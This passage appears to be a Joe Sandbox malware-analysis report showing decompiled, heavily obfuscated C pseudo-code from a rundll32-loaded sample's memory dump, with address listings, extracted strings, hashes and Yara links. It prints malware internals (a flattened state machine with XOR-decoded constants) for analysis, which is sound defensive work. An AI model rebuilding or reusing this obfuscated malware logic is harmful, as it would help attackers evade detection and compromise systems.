													_t903 =  *(_t950 + 0xcc);
													_t817 =  *(_t950 + 0x100);
													goto L48;
												} else {
													__eflags = _t806 - 0x397d406a;
													if(_t806 != 0x397d406a) {
														goto L44;
													} else {
														_t820 =  *(_t950 + 0x118);
														E00B2F98C(_t950 + 0x14c, _t950 + 0x140,  *(_t950 + 0x94),  *((intOrPtr*)(_t950 + 0x128)),  *(_t950 + 0x84));
														_t950 = _t950 + 0x10;
														asm("sbb ecx, ecx");
														_t806 = (_t820 & 0xfc9ce882) + 0x16d97506;
														goto L13;
													}
												}
											}
										}
									}
								}
							}
							goto L49;
						}
					}
				}
			}

0x00b29fe6
0x00b29fed
0x00b29ff6
0x00b29ffe
0x00b2a005
0x00b2a006
0x00b2a00d
0x00b2a00e
0x00b2a00f
0x00b2a014
0x00b2a01f
0x00b2a022
0x00b2a02d
0x00b2a02f
0x00b2a038
0x00b2a043
0x00b2a048
0x00b2a053
0x00b2a067
0x00b2a06c
0x00b2a075
0x00b2a080
0x00b2a092
0x00b2a097
0x00b2a0a0
0x00b2a0ab
0x00b2a0b6
0x00b2a0be
0x00b2a0c6
0x00b2a0ce
0x00b2a0d9
0x00b2a0e4
0x00b2a0ec
0x00b2a0f7
0x00b2a102
0x00b2a10d
0x00b2a118
0x00b2a120
0x00b2a129
0x00b2a12e
0x00b2a134
0x00b2a13c
0x00b2a147
0x00b2a152
0x00b2a15a
0x00b2a165
0x00b2a177
0x00b2a17a
0x00b2a181
0x00b2a188
0x00b2a193
0x00b2a19b
0x00b2a1a0
0x00b2a1a8
0x00b2a1b0
0x00b2a1b8
0x00b2a1c0
0x00b2a1ca
0x00b2a1ce
0x00b2a1d4
0x00b2a1dc
0x00b2a1e7
0x00b2a1ef
0x00b2a1fa
0x00b2a202
0x00b2a206
0x00b2a20a
0x00b2a20f
0x00b2a217
0x00b2a222
0x00b2a22a
0x00b2a232
0x00b2a23d
0x00b2a248
0x00b2a253
0x00b2a25e
0x00b2a269
0x00b2a271
0x00b2a27c
0x00b2a287
0x00b2a292
0x00b2a29a
0x00b2a2a5
0x00b2a2b0
0x00b2a2bb
0x00b2a2c6
0x00b2a2db
0x00b2a2de
0x00b2a2df
0x00b2a2e6
0x00b2a2f1
0x00b2a2fc
0x00b2a304
0x00b2a30c
0x00b2a317
0x00b2a32a
0x00b2a331
0x00b2a33c
0x00b2a352
0x00b2a359
0x00b2a364
0x00b2a36f
0x00b2a382
0x00b2a389
0x00b2a394
0x00b2a39f
0x00b2a3aa
0x00b2a3b2
0x00b2a3bd
0x00b2a3c5
0x00b2a3cd
0x00b2a3d2
0x00b2a3da
0x00b2a3e5
0x00b2a3f0
0x00b2a3fb
0x00b2a406
0x00b2a411
0x00b2a41c
0x00b2a427
0x00b2a42f
0x00b2a434
0x00b2a43c
0x00b2a444
0x00b2a44c
0x00b2a460
0x00b2a467
0x00b2a472
0x00b2a47d
0x00b2a487
0x00b2a492
0x00b2a49d
0x00b2a4a5
0x00b2a4b0
0x00b2a4be
0x00b2a4c3
0x00b2a4ce
0x00b2a4d1
0x00b2a4d5
0x00b2a4da
0x00b2a4e2
0x00b2a4ea
0x00b2a4f2
0x00b2a4f7
0x00b2a4ff
0x00b2a507
0x00b2a512
0x00b2a51a
0x00b2a525
0x00b2a530
0x00b2a538
0x00b2a53d
0x00b2a545
0x00b2a54d
0x00b2a558
0x00b2a563
0x00b2a56e
0x00b2a57e
0x00b2a582
0x00b2a58a
0x00b2a58e
0x00b2a596
0x00b2a59e
0x00b2a5a6
0x00b2a5ab
0x00b2a5b3
0x00b2a5bb
0x00b2a5c6
0x00b2a5d1
0x00b2a5dc
0x00b2a5e7
0x00b2a5f2
0x00b2a5fd
0x00b2a609
0x00b2a60c
0x00b2a610
0x00b2a618
0x00b2a61d
0x00b2a625
0x00b2a638
0x00b2a63f
0x00b2a64a
0x00b2a652
0x00b2a657
0x00b2a65c
0x00b2a664
0x00b2a66c
0x00b2a679
0x00b2a67d
0x00b2a685
0x00b2a68d
0x00b2a695
0x00b2a6a5
0x00b2a6aa
0x00b2a6b0
0x00b2a6b5
0x00b2a6bd
0x00b2a6c5
0x00b2a6ce
0x00b2a6d3
0x00b2a6dd
0x00b2a6e2
0x00b2a6e8
0x00b2a6f0
0x00b2a6fb
0x00b2a706
0x00b2a711
0x00b2a719
0x00b2a71e
0x00b2a723
0x00b2a72b
0x00b2a733
0x00b2a73b
0x00b2a740
0x00b2a748
0x00b2a750
0x00b2a758
0x00b2a75d
0x00b2a762
0x00b2a76a
0x00b2a776
0x00b2a77b
0x00b2a785
0x00b2a78a
0x00b2a790
0x00b2a798
0x00b2a7a0
0x00b2a7ab
0x00b2a7b6
0x00b2a7c1
0x00b2a7d3
0x00b2a7d8
0x00b2a7e9
0x00b2a7ea
0x00b2a7f1
0x00b2a7fc
0x00b2a807
0x00b2a80f
0x00b2a81a
0x00b2a825
0x00b2a830
0x00b2a83b
0x00b2a846
0x00b2a854
0x00b2a858
0x00b2a860
0x00b2a868
0x00b2a872
0x00b2a87d
0x00b2a888
0x00b2a893
0x00b2a89b
0x00b2a8a0
0x00b2a8a5
0x00b2a8ad
0x00b2a8b5
0x00b2a8c0
0x00b2a8cb
0x00b2a8d6
0x00b2a8e1
0x00b2a8ec
0x00b2a8f7
0x00b2a902
0x00b2a90d
0x00b2a918
0x00b2a923
0x00b2a92b
0x00b2a936
0x00b2a941
0x00b2a955
0x00b2a95a
0x00b2a961
0x00b2a96c
0x00b2a977
0x00b2a982
0x00b2a989
0x00b2a991
0x00b2a99c
0x00b2a9a4
0x00b2a9ac
0x00b2a9b1
0x00b2a9b9
0x00b2a9c9
0x00b2a9cf
0x00b2a9d7
0x00b2a9df
0x00b2a9e7
0x00b2a9ef
0x00b2a9f8
0x00b2a9fd
0x00b2aa03
0x00b2aa0b
0x00b2aa1e
0x00b2aa1f
0x00b2aa26
0x00b2aa31
0x00b2aa3c
0x00b2aa44
0x00b2aa4f
0x00b2aa5a
0x00b2aa65
0x00b2aa79
0x00b2aa80
0x00b2aa92
0x00b2aa99
0x00b2aa9d
0x00b2aa9d
0x00b2aa9d
0x00b2aaa1
0x00b2aaa1
0x00b2aaa4
0x00b2aaa4
0x00b2aaa4
0x00b2aaaa
0x00000000
0x00000000
0x00b2aab0
0x00b2aab0
0x00b2adbb
0x00b2ae14
0x00b2ae19
0x00b2ae2d
0x00b2ae32
0x00b2ae38
0x00b2aa9d
0x00b2aa9d
0x00b2aa9d
0x00000000
0x00b2aa9d
0x00b2aab6
0x00b2aab6
0x00b2aabc
0x00b2ace5
0x00b2aceb
0x00b2adaa
0x00b2adb1
0x00000000
0x00b2acf1
0x00b2acf1
0x00b2acf7
0x00b2ad88
0x00b2ad8d
0x00000000
0x00b2acfd
0x00b2acfd
0x00b2ad03
0x00000000
0x00b2ad09
0x00b2ad10
0x00b2ad26
0x00b2ad2e
0x00b2ad64
0x00b2ad69
0x00b2ad6e
0x00b2ad76
0x00000000
0x00b2ad76
0x00b2ad03
0x00b2acf7
0x00b2aac2
0x00b2aac2
0x00b2acac
0x00b2acbb
0x00b2acc2
0x00b2acc9
0x00b2acd1
0x00b2acd2
0x00b2acda
0x00000000
0x00b2aac8
0x00b2aace
0x00b2ac86
0x00b2ac8d
0x00000000
0x00b2aad4
0x00b2aada
0x00b2ac01
0x00b2ac02
0x00b2ac0b
0x00b2ac0d
0x00b2ac29
0x00b2ac2d
0x00b2ac2f
0x00b2ac4c
0x00b2ac51
0x00b2ac54
0x00b2ac58
0x00b2ac5a
0x00b2b013
0x00b2b014
0x00b2b01b
0x00b2b022
0x00b2b041
0x00b2b041
0x00b2ac60
0x00b2ac60
0x00b2aa9d
0x00b2aa9d
0x00b2aa9d
0x00000000
0x00b2aa9d
0x00b2aa9d
0x00b2ac5a
0x00b2aae0
0x00b2aae6
0x00b2abcb
0x00b2abcf
0x00b2abd2
0x00b2abd7
0x00b2abde
0x00b2abde
0x00000000
0x00b2aaec
0x00b2aaec
0x00b2aaf2
0x00b2b006
0x00b2b006
0x00b2b00c
0x00b2abe2
0x00b2abe2
0x00000000
0x00b2abe2
0x00b2aaf8
0x00b2aaf8
0x00b2ab0b
0x00b2ab12
0x00b2ab3b
0x00b2ab4e
0x00b2ab6c
0x00b2ab71
0x00b2ab85
0x00b2ab8a
0x00b2ab91
0x00b2ab98
0x00b2ab9c
0x00b2aba0
0x00b2aaa1
0x00b2aaa4
0x00b2aaa4
0x00b2aaaa
0x00000000
0x00000000
0x00b2aaaa
0x00b2aaf2
0x00b2aae6
0x00b2aada
0x00b2aace
0x00b2aac2
0x00b2aabc
0x00b2b04a
0x00b2b054
0x00b2ae42
0x00b2ae42
0x00b2ae48
0x00b2afef
0x00b2aff1
0x00b2b001
0x00000000
0x00b2aff3
0x00b2aff3
0x00000000
0x00b2aff3
0x00b2ae4e
0x00b2ae4e
0x00b2ae54
0x00b2af59
0x00b2af64
0x00b2af69
0x00b2af69
0x00b2af6a
0x00b2af94
0x00b2af9b
0x00b2afa0
0x00b2afa3
0x00b2afa8
0x00b2afa9
0x00b2afac
0x00b2afaf
0x00b2afaf
0x00b2afaf
0x00b2afb2
0x00b2afbb
0x00b2afbe
0x00b2afc7
0x00000000
0x00b2ae5a
0x00b2ae5a
0x00b2ae60
0x00b2af41
0x00b2af48
0x00000000
0x00b2ae66
0x00b2ae66
0x00b2ae6c
0x00b2af1a
0x00b2af21
0x00000000
0x00b2ae72
0x00b2ae72
0x00b2ae78
0x00b2aef6
0x00b2aefd
0x00000000
0x00b2ae7a
0x00b2ae7a
0x00b2ae80
0x00b2b02b
0x00b2b02c
0x00b2b033
0x00b2b03a
0x00000000
0x00b2ae86
0x00b2ae86
0x00b2ae8c
0x00000000
0x00b2ae92
0x00b2aeb5
0x00b2aebd
0x00b2aec2
0x00b2aec7
0x00b2aecf
0x00000000
0x00b2aecf
0x00b2ae8c
0x00b2ae80
0x00b2ae78
0x00b2ae6c
0x00b2ae60
0x00b2ae54
0x00000000
0x00b2ae48
0x00b2aaa4
0x00b2aaa1

Strings

E, xrefs: 00B2A991
q, xrefs: 00B2A4DA
Lf, xrefs: 00B2A625
Q[, xrefs: 00B2A188
m, xrefs: 00B2A10D
nXj, xrefs: 00B2A014
=;, xrefs: 00B2A102
{, xrefs: 00B2A893
C/, xrefs: 00B2A76A
S', xrefs: 00B2A72B
M#, xrefs: 00B2A0EC
25, xrefs: 00B2A33C
cA, xrefs: 00B2A15A
./, xrefs: 00B2A492
"m, xrefs: 00B2A860
}=, xrefs: 00B2A762
m9, xrefs: 00B2A61D
#}, xrefs: 00B2A507
dW, xrefs: 00B2AA80
Q, xrefs: 00B2A7C1
5a, xrefs: 00B2A5FD
w, xrefs: 00B2A44C
j@}9, xrefs: 00B2AE86
p=4E, xrefs: 00B2A8E1
NS5, xrefs: 00B2A750
%, xrefs: 00B2A3BD
jg, xrefs: 00B2A165
Z9, xrefs: 00B2A427
<8, xrefs: 00B2A134
KZ, xrefs: 00B2A5DC
tu, xrefs: 00B2A706

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
API String ID: 0-3061497230
Opcode ID: 20cf77df48ad993a8ffefcbc68ac098ea778ef34a9e587f85e6589cc157393ec
Instruction ID: 9c251a030eecf2809860bae7d13221827b1489a1def12c3f63c2eaa89d689a26
Opcode Fuzzy Hash: 20cf77df48ad993a8ffefcbc68ac098ea778ef34a9e587f85e6589cc157393ec
Instruction Fuzzy Hash: 7C82127150C3818BE379CF25C589B9BBBE1FB84314F10895DE29E862A0DBB59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B2C769, Relevance: 24.4, Strings: 19, Instructions: 630
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00B2C769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				char _v320;
				intOrPtr _t666;
				intOrPtr _t667;
				intOrPtr _t672;
				void* _t679;
				intOrPtr _t680;
				intOrPtr _t687;
				intOrPtr _t689;
				intOrPtr _t693;
				intOrPtr* _t694;
				signed int _t706;
				intOrPtr _t707;
				void* _t712;
				intOrPtr _t718;
				void* _t758;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				intOrPtr _t785;
				signed int _t786;
				intOrPtr _t788;
				char _t793;
				void* _t795;
				void* _t797;

				_t694 = __edx;
				_push(_a40);
				_push(_a36);
				_v20 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_a20 & 0x0000ffff);
				_v12 = 0x78501c;
				_v24 = 0;
				_v8 = 0;
				_t793 = 0;
				_v4 = 0;
				_t795 =  &_v320 + 0x30;
				_v232 = 0x7906;
				_t786 = 0xcd25e5e;
				_v232 = _v232 << 6;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 ^ 0x00000790;
				_v156 = 0xf83b;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 ^ 0x0000000c;
				_v52 = 0x2ceb;
				_v52 = _v52 | 0xa5610ac4;
				_v52 = _v52 ^ 0xa5612e27;
				_v208 = 0x96db;
				_v208 = _v208 + 0xffffce2c;
				_v208 = _v208 | 0x71346f29;
				_v208 = _v208 ^ 0x7134ef2f;
				_v116 = 0x28a4;
				_v116 = _v116 + 0xffff342e;
				_v116 = _v116 ^ 0xffff1cd2;
				_v124 = 0xa3bc;
				_v124 = _v124 + 0xffffb3e2;
				_v124 = _v124 ^ 0x0040579e;
				_v132 = 0x4a92;
				_v132 = _v132 << 0xb;
				_v132 = _v132 ^ 0x02509000;
				_v140 = 0xcc93;
				_v140 = _v140 >> 0xd;
				_v140 = _v140 ^ 0x04000006;
				_v148 = 0xadf6;
				_v148 = _v148 >> 5;
				_v148 = _v148 ^ 0x0008056f;
				_v216 = 0xcf16;
				_v216 = _v216 ^ 0x2caffd24;
				_v216 = _v216 >> 8;
				_v216 = _v216 ^ 0x002cad32;
				_v296 = 0xe55e;
				_v296 = _v296 << 0x10;
				_v296 = _v296 + 0xffff79ea;
				_v296 = _v296 << 5;
				_v296 = _v296 ^ 0xabaf3c40;
				_v152 = 0xf9a;
				_v16 = 0;
				_v320 = 0;
				_v152 = _v152 * 0x3f;
				_v152 = _v152 ^ 0x8003d6e6;
				_v120 = 0x15;
				_v120 = _v120 << 2;
				_v120 = _v120 ^ 0x00000054;
				_v144 = 0x2eae;
				_v144 = _v144 + 0x3c19;
				_v144 = _v144 ^ 0x00006ac4;
				_v56 = 0xab01;
				_t773 = 0x5e;
				_v56 = _v56 / _t773;
				_v56 = _v56 ^ 0x00004cb8;
				_v104 = 0x2a8e;
				_t774 = 0x2c;
				_v104 = _v104 / _t774;
				_v104 = _v104 ^ 0x000033ed;
				_v292 = 0xd22b;
				_v292 = _v292 | 0xd3babaa8;
				_t775 = 0x50;
				_v292 = _v292 * 0x6c;
				_v292 = _v292 >> 7;
				_v292 = _v292 ^ 0x00a58d92;
				_v96 = 0x39fa;
				_v96 = _v96 / _t775;
				_v96 = _v96 ^ 0x00002d01;
				_v240 = 0xf5d4;
				_v240 = _v240 ^ 0x5b9fa071;
				_v240 = _v240 >> 3;
				_v240 = _v240 ^ 0x0b73efef;
				_v248 = 0x1311;
				_t776 = 0x42;
				_v248 = _v248 / _t776;
				_v248 = _v248 + 0x5e6d;
				_v248 = _v248 ^ 0x00004acc;
				_v88 = 0x907;
				_t777 = 0x6e;
				_v88 = _v88 * 0x48;
				_v88 = _v88 ^ 0x0002ff0c;
				_v36 = 0x8ec2;
				_v36 = _v36 / _t777;
				_v36 = _v36 ^ 0x00005772;
				_v260 = 0x4792;
				_v260 = _v260 << 0xd;
				_v260 = _v260 >> 0xb;
				_v260 = _v260 >> 4;
				_v260 = _v260 ^ 0x00006a86;
				_v224 = 0x4f89;
				_v224 = _v224 + 0xffff3059;
				_t778 = 0x21;
				_v224 = _v224 * 0x6e;
				_v224 = _v224 ^ 0xffc8e4d3;
				_v48 = 0x8858;
				_v48 = _v48 + 0x804a;
				_v48 = _v48 ^ 0x00017e21;
				_v312 = 0xd58c;
				_v312 = _v312 | 0x45747a0f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 / _t778;
				_v312 = _v312 ^ 0x00008646;
				_v300 = 0xadcd;
				_v300 = _v300 >> 8;
				_v300 = _v300 << 9;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x00008fc4;
				_v268 = 0xd742;
				_t779 = 0x30;
				_v268 = _v268 / _t779;
				_v268 = _v268 + 0x61d9;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x00000191;
				_v204 = 0x8d76;
				_v204 = _v204 | 0x1111a955;
				_v204 = _v204 << 5;
				_v204 = _v204 ^ 0x2235a282;
				_v64 = 0x8939;
				_v64 = _v64 + 0xffff3fc4;
				_v64 = _v64 ^ 0xffff80c7;
				_v276 = 0x72;
				_v276 = _v276 * 0x7d;
				_v276 = _v276 + 0xffff8366;
				_v276 = _v276 >> 9;
				_v276 = _v276 ^ 0x007facee;
				_v44 = 0xf34a;
				_v44 = _v44 + 0xffffbf38;
				_v44 = _v44 ^ 0x00008263;
				_v112 = 0x1dc0;
				_v112 = _v112 ^ 0x2c6551d7;
				_v112 = _v112 ^ 0x2c653ad3;
				_v228 = 0xc596;
				_v228 = _v228 ^ 0x9ca21630;
				_v228 = _v228 ^ 0x8f0fd5bf;
				_v228 = _v228 ^ 0x13ad7fff;
				_v196 = 0x8cfa;
				_v196 = _v196 >> 1;
				_v196 = _v196 ^ 0xfb4b109c;
				_v196 = _v196 ^ 0xfb4b1bca;
				_v236 = 0x2fd6;
				_v236 = _v236 << 7;
				_v236 = _v236 << 2;
				_v236 = _v236 ^ 0x005fedce;
				_v180 = 0x51a5;
				_v180 = _v180 ^ 0x4af0041f;
				_v180 = _v180 + 0xfffff3cf;
				_v180 = _v180 ^ 0x4af05e30;
				_v244 = 0x8950;
				_v244 = _v244 << 0xc;
				_v244 = _v244 | 0xbaabdb8a;
				_v244 = _v244 ^ 0xbabf869d;
				_v40 = 0xc836;
				_v40 = _v40 + 0xffff3474;
				_v40 = _v40 ^ 0xffff8af1;
				_v176 = 0x9727;
				_v176 = _v176 + 0xffffb8fc;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x00001e80;
				_v304 = 0x64c7;
				_v304 = _v304 + 0x56f7;
				_v304 = _v304 ^ 0x2de137fe;
				_v304 = _v304 + 0xaf99;
				_v304 = _v304 ^ 0x2de22ef8;
				_v308 = 0x2e06;
				_v308 = _v308 | 0x78777a1f;
				_v308 = _v308 * 0x79;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x1e0f1828;
				_v92 = 0xc9a2;
				_v92 = _v92 | 0xf3c29ea2;
				_v92 = _v92 ^ 0xf3c28d84;
				_v100 = 0xecbf;
				_v100 = _v100 + 0xffff0faf;
				_v100 = _v100 ^ 0xffffc0a5;
				_v192 = 0x95e0;
				_v192 = _v192 << 8;
				_v192 = _v192 << 9;
				_v192 = _v192 ^ 0x2bc00f3b;
				_v200 = 0x7c40;
				_t780 = 0x3a;
				_v200 = _v200 / _t780;
				_v200 = _v200 << 8;
				_v200 = _v200 ^ 0x000244df;
				_v272 = 0x7605;
				_v272 = _v272 << 5;
				_v272 = _v272 + 0xffffdeaf;
				_v272 = _v272 >> 0xb;
				_v272 = _v272 ^ 0x00001482;
				_v108 = 0x1c78;
				_v108 = _v108 + 0x3c33;
				_v108 = _v108 ^ 0x00006c40;
				_v280 = 0xd61a;
				_v280 = _v280 ^ 0xfb8fe6a7;
				_v280 = _v280 + 0x5fc;
				_v280 = _v280 | 0xbad3e440;
				_v280 = _v280 ^ 0xfbdf8156;
				_v288 = 0x89a2;
				_v288 = _v288 + 0xffff4641;
				_v288 = _v288 >> 0xc;
				_v288 = _v288 >> 0xd;
				_v288 = _v288 ^ 0x000071e8;
				_v252 = 0xe21c;
				_v252 = _v252 ^ 0x457ecc8f;
				_t781 = 0x67;
				_v252 = _v252 * 0x59;
				_v252 = _v252 ^ 0x28de7ded;
				_v84 = 0xe1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x00001e3a;
				_v184 = 0xbeeb;
				_v184 = _v184 * 0x12;
				_v184 = _v184 + 0x8ae1;
				_v184 = _v184 ^ 0x000de1ad;
				_v68 = 0xfd10;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000036f7;
				_v76 = 0x1f03;
				_v76 = _v76 * 0x49;
				_v76 = _v76 ^ 0x000897f9;
				_v264 = 0xf0d9;
				_v264 = _v264 * 0x66;
				_v264 = _v264 + 0xffffb5cf;
				_v264 = _v264 + 0xea22;
				_v264 = _v264 ^ 0x0060dcb6;
				_v168 = 0xdfa9;
				_v168 = _v168 ^ 0x7c3d7298;
				_v168 = _v168 ^ 0xd2777362;
				_v168 = _v168 ^ 0xae4ad343;
				_v72 = 0x8534;
				_v72 = _v72 ^ 0x085524ca;
				_v72 = _v72 ^ 0x085595c2;
				_v136 = 0x90f3;
				_v136 = _v136 + 0xcfad;
				_v136 = _v136 ^ 0x00017ab2;
				_v220 = 0x7eee;
				_v220 = _v220 >> 3;
				_v220 = _v220 + 0xffffea23;
				_v220 = _v220 ^ 0xffffcf89;
				_v164 = 0x31cc;
				_v164 = _v164 | 0x82d13576;
				_v164 = _v164 >> 3;
				_v164 = _v164 ^ 0x105a14dc;
				_v284 = 0xab9f;
				_v284 = _v284 / _t781;
				_v284 = _v284 + 0xffff982b;
				_v284 = _v284 + 0xcf45;
				_v284 = _v284 ^ 0x000072b9;
				_v80 = 0x4458;
				_v80 = _v80 + 0xfa7e;
				_v80 = _v80 ^ 0x000168e1;
				_v128 = 0x89b9;
				_v128 = _v128 + 0xe32e;
				_v128 = _v128 ^ 0x00010bac;
				_v172 = 0xe617;
				_v172 = _v172 << 4;
				_v172 = _v172 + 0xb499;
				_v172 = _v172 ^ 0x000f5cd6;
				_v212 = 0x2b1d;
				_v212 = _v212 << 0x10;
				_t782 = 0x21;
				_v212 = _v212 * 0x7f;
				_v212 = _v212 ^ 0x63636a51;
				_v188 = 0x87b6;
				_v188 = _v188 | 0xa87ad713;
				_v188 = _v188 << 3;
				_v188 = _v188 ^ 0x43d6c05c;
				_v60 = 0x1ec0;
				_v60 = _v60 / _t782;
				_v60 = _v60 ^ 0x000042c8;
				_v256 = 0x1798;
				_v256 = _v256 ^ 0x8091dd24;
				_v256 = _v256 | 0xdc47dedf;
				_t783 = 0x19;
				_v256 = _v256 * 0x5d;
				_v256 = _v256 ^ 0x3a6c6c2e;
				_v160 = 0x6f3f;
				_v160 = _v160 / _t783;
				_t784 = 0x73;
				_t785 = _v20;
				_v160 = _v160 / _t784;
				_v160 = _v160 ^ 0x00005ad1;
				while(1) {
					L1:
					_t758 = 0x1fbed331;
					while(1) {
						_t797 = _t786 - _t758;
						if(_t797 <= 0) {
						}
						L3:
						if(_t797 == 0) {
							__eflags = E00B25B79(_t785, _v20);
							_t786 = 0x1b724d6a;
							_t679 = 1;
							_t793 =  !=  ? _t679 : _t793;
							L13:
							_t666 = _v316;
							L14:
							_t707 = _v320;
							goto L1;
						}
						if(_t786 == 0xa0d70be) {
							__eflags = _t694;
							if(_t694 == 0) {
								_t718 = 0;
								__eflags = 0;
							} else {
								_t718 =  *_t694;
							}
							__eflags = _t694;
							if(_t694 == 0) {
								_t680 = 0;
								__eflags = 0;
							} else {
								_t680 =  *((intOrPtr*)(_t694 + 4));
							}
							E00B38422(_v72, _v136, _v220, _a28, _t785, _t680, _t718, _v164, _t718);
							_t795 = _t795 + 0x1c;
							asm("sbb esi, esi");
							_t786 = (_t786 & 0x1873afa8) + 0x1b724d6a;
							goto L13;
						}
						if(_t786 == 0xcd25e5e) {
							_t786 = 0x25fbc0d1;
							while(1) {
								_t797 = _t786 - _t758;
								if(_t797 <= 0) {
								}
								goto L25;
							}
							goto L3;
						}
						if(_t786 == 0xdfc12f5) {
							_t666 = E00B37955(_a20, _v228, _v196, _t707, _v236, _v180, _t707, _v244, _v40, _v144, _a12, _t707, _v32, _t707, _v176);
							_t795 = _t795 + 0x34;
							_v316 = _t666;
							__eflags = _t666;
							_t786 =  !=  ? 0x20246154 : 0x1e7ff602;
							goto L14;
						}
						if(_t786 == 0x1b724d6a) {
							E00B27925(_v284, _t785, _v80, _v128);
							_t786 = 0x2cd2473d;
							L12:
							goto L13;
						}
						if(_t786 != 0x1e7ff602) {
							L45:
							__eflags = _t786 - 0x258a7eda;
							if(_t786 == 0x258a7eda) {
								L10:
								return _t793;
							}
							_t666 = _v316;
							continue;
						}
						E00B27925(_v60, _v32, _v256, _v160);
						goto L10;
						L25:
						__eflags = _t786 - 0x20246154;
						if(_t786 == 0x20246154) {
							__eflags = _t694;
							if(__eflags == 0) {
								_t787 = _v16;
							} else {
								_push(_v308);
								_t667 = E00B3889D(0xb3c850, _v304, __eflags);
								_t787 = _t667;
								_v16 = _t667;
							}
							_t785 = E00B21BD7(_v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v92, _v100, _v192, _v200, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v316, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _t705, _v272, _t787, _v108, _a24, _t705, _v280, _v288);
							_t706 = _v252;
							E00B32025(_t706, _t787, _v84, _v184);
							_t795 = _t795 + 0x40;
							__eflags = _t785;
							if(_t785 == 0) {
								_t786 = 0x2cd2473d;
								L44:
								_t707 = _v320;
								_t758 = 0x1fbed331;
								goto L45;
							}
							_push(_t706);
							_v28 = 1;
							_t693 = E00B36AFF(_v68, _v76, _v264,  &_v28, _v168, _t785);
							_t795 = _t795 + 0x18;
							_v28 = _t693;
							_t786 = 0xa0d70be;
							goto L13;
						}
						__eflags = _t786 - 0x25fbc0d1;
						if(_t786 == 0x25fbc0d1) {
							_push(0x200);
							_v24 = 0x200;
							_t788 = E00B28736(0x200);
							_t712 = 0x200;
							__eflags = _t788;
							if(_t788 != 0) {
								_t687 = E00B2F74E(_t712, _t788,  &_v24, _v96, _v240, _v248);
								_t795 = _t795 + 0x10;
								__eflags = _t687;
								if(_t687 == 0) {
									_t689 = E00B30F0C(_v88, _t788, _t712, _v36, _v232, _t712, _v260);
									_t795 = _t795 + 0x14;
									_v320 = _t689;
								}
								E00B2F536(_v224, _v48, _v312, _t788);
							}
							_t786 = 0x276816a4;
							goto L13;
						}
						__eflags = _t786 - 0x276816a4;
						if(_t786 == 0x276816a4) {
							_push(_t707);
							_t672 = E00B25A52(_t707, _t707, _v300, _v268, _v204, _v64, _v120);
							__eflags = _t672;
							_v32 = _t672;
							_t786 =  !=  ? 0xdfc12f5 : 0x258a7eda;
							E00B2F536(_v276, _v44, _v112, _v320);
							_t795 = _t795 + 0x24;
							goto L44;
						}
						__eflags = _t786 - 0x2cd2473d;
						if(_t786 == 0x2cd2473d) {
							E00B27925(_v172, _t666, _v212, _v188);
							_t786 = 0x1e7ff602;
							goto L12;
						}
						__eflags = _t786 - 0x33e5fd12;
						if(__eflags != 0) {
							goto L45;
						}
						__eflags = E00B3687F(_t785, _v156, __eflags) - _v52;
						_t758 = 0x1fbed331;
						_t666 = _v316;
						_t707 = _v320;
						_t786 =  ==  ? 0x1fbed331 : 0x1b724d6a;
					}
				}
			}

0x00b2c777
